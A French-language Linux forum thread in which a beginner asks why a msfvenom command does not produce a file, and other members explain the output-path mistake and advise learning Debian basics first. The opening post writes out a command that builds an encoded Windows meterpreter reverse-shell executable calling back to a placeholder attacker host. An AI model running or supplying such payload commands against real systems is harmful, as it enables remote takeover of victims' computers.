user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'

Vous n'êtes pas identifié(e).

#1 23-10-2017 11:40:33

namorlabien
Membre

probleme avec msf venom

bonjour, je poste ici car voila j'ai un soucis effectivement lorsque je chercher a créer mon payload via cette ligne de commande :
~# msfvenom -p windows/meterpreter/reverse_tcp -f exe  -e x86/shikata_ga_nai  -a x86 --platform windows lhost=ip_host lport=port_host -o /desktop test.exe

cela m'affiche :

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with final size 360
Payload size: 360 bytes
Final size of exe file: 73802 bytes
Saved as: /desktop

Mais le fichier ne se créer pas et n’apparaît nulle part, voila si quelqu'un pourrais m'apportais la lumière divine dans se titanesque problème auquel je suis confronté ceci serais fortement sympathique voila merci d'avance et bonne journée

je ne sais pas si le sujet et bien placé mais j’espère que je ne risquerais pas une sanction destructrice  si c'est le cas car j'en suis fortement désolé. merci

Hors ligne

#2 23-10-2017 14:29:08

Azgarech
Crazy one

Re : probleme avec msf venom

Saved as: /desktop

Tu devrais plutôt avoir pour l'option -o /Desktop/test.exe

Tu as bien un fichier qui a été créé mais il se nomme "/desktop" dans le path par défaut de l'application


Security is always excessive until it’s not enough. — Robbie Sinclair

Hors ligne

#3 23-10-2017 17:35:51

namorlabien
Membre

Re : probleme avec msf venom

Merci de m'aider, le problème quand j'essaye avec /Desktop/test.exe il me sort cette erreur :
Error: Not a directory @ rb_sysopen - /Desktop/test.exe

et pourtant quand je fait la commande: ls -a
il n'y a aucun fichier du nom de test.exe qui apparais

voila voila   merci

Dernière modification par namorlabien (23-10-2017 17:38:29)

Hors ligne

#4 23-10-2017 18:18:56

Azgarech
Crazy one

Re : probleme avec msf venom

Normal que ça ne marche pas.

Tu n'as pas de répertoire /Desktop existant mais il existe là ~/Desktop/   ~ équivalent à $HOME ton home directory soit un répertoire /home/tonuser/Desktop

Avant de vouloir hacker la planète, je te conseille de te faire la main sur un OS comme Debian et faire tes premières armes sans le hacking mais juste pour apprendre les bases.

danger  Si tu essayes de courir avant d'apprendre à ramper tu vas te casser les dents.  danger


Security is always excessive until it’s not enough. — Robbie Sinclair

Hors ligne

#5 23-10-2017 21:07:21

ZeR0-@bSoLu
Membre

Re : probleme avec msf venom

Azgarech à tout dit , cela n'a rien avoir avec msfvenom lui même mais c'est plus généralement un problème de l'utilisation du terminal , Apprend à utiliser Debian avant kali


Mess With The Bests
Die Like The Rest

Hors ligne

Pied de page des forums